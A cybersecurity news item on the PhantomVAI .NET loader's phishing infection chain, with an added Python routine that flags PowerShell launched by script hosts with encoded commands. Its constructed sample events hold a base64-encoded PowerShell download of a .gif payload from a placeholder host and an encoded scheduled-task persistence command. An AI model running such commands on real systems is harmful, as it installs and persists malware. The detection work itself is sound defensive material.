PhantomVAI Loader: New Multi-Stage .NET Loader in Phishing Campaigns

Cyber Security News by CyberSum.net
PhantomVAI Loader, a newly renamed multi-stage .NET loader, is being used in widespread phishing campaigns to deliver a range of information-stealing malware. Initially identified as Katz Stealer Loader, it now supports multiple payloads through an evasive infection chain built on obfuscated scripts, steganography and virtual-machine detection. Organizations across multiple sectors have been targeted in this global campaign, and because the loader is sold on underground marketplaces, even low-skill actors can run a complex attack chain.

The infection chain begins with phishing emails themed around sales, payments or legal action, sometimes using homograph attacks to trick recipients. The emails carry ZIP archives containing obfuscated JavaScript or VBS files that embed a Base64-encoded PowerShell script; that script fetches a GIF file with a DLL payload hidden steganographically inside it. PhantomVAI Loader then performs virtual-machine detection checks and establishes persistence through scheduled tasks or Run registry keys before downloading the final payload and injecting it into a legitimate executable.
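The early stages of the chain described above leave a recognisable trace in process-creation telemetry: a script host (wscript/cscript) spawning PowerShell with an encoded command that fetches a .gif, or later registers a scheduled task or Run key. The Python triage routine below is an added example, not code from the cited reports or from any vendor; it assumes a simplified event shape (parent image, child image, command line) and runs over constructed sample events with placeholder URLs and paths.

```python
import base64
import re
from dataclasses import dataclass

# Constructed process-creation records (not real telemetry): parent image,
# child image and command line, as an EDR or Sysmon Event ID 1 would log them.
@dataclass
class ProcEvent:
    parent: str
    image: str
    cmdline: str

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}          # JS/VBS droppers run here
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

def decode_encoded_command(cmdline):
    """Return the PowerShell -EncodedCommand payload as text, or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:  # -EncodedCommand carries UTF-16LE text, base64 encoded
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def classify(event):
    """List the PhantomVAI-style traits an event shows (empty list = no match)."""
    reasons = []
    if event.image.lower() != "powershell.exe":
        return reasons
    if event.parent.lower() in SCRIPT_HOSTS:
        reasons.append("powershell spawned by script host")
    script = decode_encoded_command(event.cmdline)
    if script is not None:
        reasons.append("base64-encoded command")
        if re.search(r"https?://\S+\.gif", script, re.I):
            reasons.append("encoded script fetches a .gif")
        if re.search(r"schtasks|CurrentVersion\\Run", script, re.I):
            reasons.append("persistence via scheduled task or Run key")
    return reasons

def _enc(ps):  # helper that encodes a script the way -EncodedCommand expects
    return base64.b64encode(ps.encode("utf-16-le")).decode()

SAMPLE_EVENTS = [  # constructed samples; URL and paths are placeholders
    ProcEvent("wscript.exe", "powershell.exe", "powershell.exe -nop -w hidden -enc "
              + _enc("$g=(New-Object Net.WebClient).DownloadData('http://example.invalid/i.gif')")),
    ProcEvent("cscript.exe", "powershell.exe", "powershell.exe -ec "
              + _enc("schtasks /create /tn Upd /tr C:\\Users\\Public\\u.exe /sc onlogon")),
    ProcEvent("explorer.exe", "powershell.exe", "powershell.exe -File C:\\ops\\backup.ps1"),
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev.parent, "->", ev.image, classify(ev) or "no match")
```

Decoding the encoded command rather than matching on the raw base64 is what makes the .gif and persistence checks possible; the same decode step is worth adding to any rule that keys on `-EncodedCommand`.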